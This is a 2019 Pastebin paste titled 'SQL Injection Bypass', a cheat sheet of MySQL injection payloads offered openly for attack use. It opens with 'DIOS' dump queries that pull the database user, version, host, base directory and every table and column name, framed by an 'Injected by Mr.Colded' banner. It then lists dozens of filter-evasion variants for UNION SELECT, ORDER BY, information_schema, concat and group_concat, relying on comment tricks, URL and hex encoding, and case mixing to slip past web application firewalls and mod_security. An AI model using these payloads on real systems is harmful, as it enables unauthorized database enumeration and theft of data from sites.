colded

SQL Injection Bypass

Jun 26th, 2019 (edited)
217
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Dios SQL
  2. concat(%27<center>%27,%27<img%20src="https://i.ibb.co/njd7L75/557d0f573a660037b6f87910d71f2f37.gif"height=%20150px"%20width=%20270px"%27,%27</center>%27,%27</br>%27,%27<font%20color="gold"%20size="5%">Injected%20by%20Mr.Colded%20%27,%27</font>%27,%27</br>%27,%27<font%20color="red">User%20:%20%27,user/**_**/(),%27</br>%27,%27<font%20color="cyan">Version%20:%20%27,version/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="sapphire">Database%20:%20%27,database/**_**/(),%27</font>%27,%27</br>%27,%27<font%20color="blue">Host%20:%20%27,@@HOSTNAME,%27</font>%27,%27</br>%27,%27<font%20color="green">Directory%20:%20%27,@@BASEDIR,%27</font>%27,%27</br>%27,%27<font%20color="bronze">Symlink%20:%20%27,@@HAVE_SYMLINK,%27</font>%27,%27</br>%27,%27<font%20color="silver">SSL%20:%20%27,@@HAVE_OPENSSL,%27</font>%27,%27</br>%27,%27<font%20color="emerald">%20Port%20:%20%27,@@port,%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))
  3.  
  4. Dios Hex
  5. concat_ws(0x3c62723e,0x323112c8a27c584a8505592f59fa1e607,0x3c62723e,0x496e6a6563746564204279204d722e436f6c646564,schema(),version(),user(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
  6.  
  7. Bypass Order By
  8. /*!5000order*/**_**//*!5000by*/
  9. /**/ORDER/**/BY/**/
  10. /*!order*/+/*!by*/
  11. /*!ORDER BY*/
  12. /*!50000ORDER BY*/
  13. /*!50000ORDER*//**//*!50000BY*/
  14. /*!12345ORDER*/+/*!BY*/
  15.  
  16. Bypass Union
  17. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  18. %55nion(%53elect 1,2,3)-- -
  19. +union+distinct+select+
  20. +union+distinctROW+select+
  21. /**//*!12345UNION SELECT*//**/
  22. /**//*!50000UNION SELECT*//**/
  23. /**/UNION/**//*!50000SELECT*//**/
  24. /*!50000UniON SeLeCt*/
  25. union /*!50000%53elect*/
  26. +#uNiOn+#sEleCt
  27. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  28. /*!%55NiOn*/ /*!%53eLEct*/
  29. /*!u%6eion*/ /*!se%6cect*/
  30. +un/**/ion+se/**/lect
  31. uni%0bon+se%0blect
  32. %2f**%2funion%2f**%2fselect
  33. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  34. REVERSE(noinu)+REVERSE(tceles)
  35. /*--*/union/*--*/select/*--*/
  36. union (/*!/**/ SeleCT */ 1,2,3)
  37. /*!union*/+/*!select*/
  38. union+/*!select*/
  39. /**/union/**/select/**/
  40. /**/uNIon/**/sEleCt/**/
  41. +%2F**/+Union/*!select*/
  42. /**//*!union*//**//*!select*//**/
  43. /*!uNIOn*/ /*!SelECt*/
  44. +union+distinct+select+
  45. +union+distinctROW+select+
  46. uNiOn aLl sElEcT
  47. UNIunionON+SELselectECT
  48. /**/union/*!50000select*//**/
  49. 0%a0union%a0select%09
  50. %0Aunion%0Aselect%0A
  51. %55nion/**/%53elect
  52. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  53. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  54. %0A%09UNION%0CSELECT%10NULL%
  55. /*!union*//*--*//*!all*//*--*//*!select*/
  56. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  57. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  58. +UnIoN/*&a=*/SeLeCT/*&a=*/
  59. union+sel%0bect
  60. +uni*on+sel*ect+
  61. +#1q%0Aunion all#qa%0A#%0Aselect
  62. union(select (1),(2),(3),(4),(5))
  63. UNION(SELECT(column)FROM(table))
  64. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  65. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  66. union(select(1),2,3)
  67. union (select 1111,2222,3333)
  68. uNioN (/*!/**/ SeleCT */ 11)
  69. union (select 1111,2222,3333)
  70. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  71. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  72. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  73. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  74. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  75. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  76. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLecT+
  77. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  78. /union\sselect/g
  79. /union\s+select/i
  80. /*!UnIoN*/SeLeCT
  81. +UnIoN/*&a=*/SeLeCT/*&a=*/
  82. +uni>on+sel>ect+
  83. +(UnIoN)+(SelECT)+
  84. +(UnI)(oN)+(SeL)(EcT)
  85. +’UnI”On’+'SeL”ECT’
  86. +uni on+sel ect+
  87. +/*!UnIoN*/+/*!SeLeCt*/+
  88. /*!u%6eion*/ /*!se%6cect*/
  89. uni%20union%20/*!select*/%20
  90. union%23aa%0Aselect
  91. /**/union/*!50000select*/
  92. /^.*union.*$/ /^.*select.*$/
  93. /*union*/union/*select*/select+
  94. /*uni X on*/union/*sel X ect*/
  95. +un/**/ion+sel/**/ect+
  96. +UnIOn%0d%0aSeleCt%0d%0a
  97. UNION/*&test=1*/SELECT/*&pwn=2*/
  98. un?+un/**/ion+se/**/lect+
  99. +UNunionION+SEselectLECT+
  100. +uni%0bon+se%0blect+
  101. %252f%252a*/union%252f%252a /select%252f%252a*/
  102. /%2A%2A/union/%2A%2A/select/%2A%2A/
  103. %2f**%2funion%2f**%2fselect%2f**%2f
  104. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  105. /*!UnIoN*/SeLecT+
  106. +AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+
  107. /*!50000union*/+/*!50000select*/+
  108. +AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/
  109. /*!50000coNCat*/
  110. unionon select 1,2,3,4 -- -
  111. /*!50000union*/+/*!50000select*/
  112. Union select 1,2,3,4 -- -
  113. /*!00000UnIOn*/+/*!00000SeLeCt*/
  114. Union all select 1,2,3,4-- -
  115. 59 and x(point(0,0)) union select 1,2,3,4-- -
  116. And/**_**/FalSe /*!50000UnIoN*/ /*!50000SeLecT*/1,2,3,4,5-- -
  117.  
  118. Bypass mod_security
  119. and mod(0,1) UnIoN sElEcT
  120.  
  121. Bypass Information_Schema
  122. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  123. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  124. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  125. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  126. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  127. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  128.  
  129. Bypass Concat
  130. CoNcAt()
  131. concat() 
  132. CON%08CAT()
  133. CoNcAt()
  134. %0AcOnCat()
  135. /**//*!12345cOnCat*/
  136. /*!50000cOnCat*/(/*!*/)
  137. unhex(hex(concat(table_name)))
  138. unhex(hex(/*!12345concat*/(table_name)))
  139. unhex(hex(/*!50000concat*/(table_name)))
  140.  
  141. Bypass Group Concat
  142. /*!group_concat*/()
  143. gRoUp_cOnCAt()
  144. group_concat(/*!*/)
  145. group_concat(/*!12345table_name*/)
  146. group_concat(/*!50000table_name*/)
  147. /*!group_concat*/(/*!12345table_name*/)
  148. /*!group_concat*/(/*!50000table_name*/)
  149. /*!12345group_concat*/(/*!12345table_name*/)
  150. /*!50000group_concat*/(/*!50000table_name*/)
  151. /*!GrOuP_ConCaT*/()
  152. /*!12345GroUP_ConCat*/()
  153. /*!50000gRouP_cOnCaT*/()
  154. /*!50000Gr%6fuP_c%6fnCAT*/()
  155. unhex(hex(group_concat(table_name)))
  156. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  157. unhex(hex(/*!12345group_concat*/(table_name)))
  158. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  159. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  160. unhex(hex(/*!50000group_concat*/(table_name)))
  161. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  162. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  163. convert(group_concat(table_name)+using+ascii)
  164. convert(group_concat(/*!table_name*/)+using+ascii)
  165. convert(group_concat(/*!12345table_name*/)+using+ascii)
  166. convert(group_concat(/*!50000table_name*/)+using+ascii)
  167. CONVERT(group_concat(table_name)+USING+latin1)
  168. CONVERT(group_concat(table_name)+USING+latin2)
  169. CONVERT(group_concat(table_name)+USING+latin3)
  170. CONVERT(group_concat(table_name)+USING+latin4)
  171. CONVERT(group_concat(table_name)+USING+latin5)
RAW Paste Data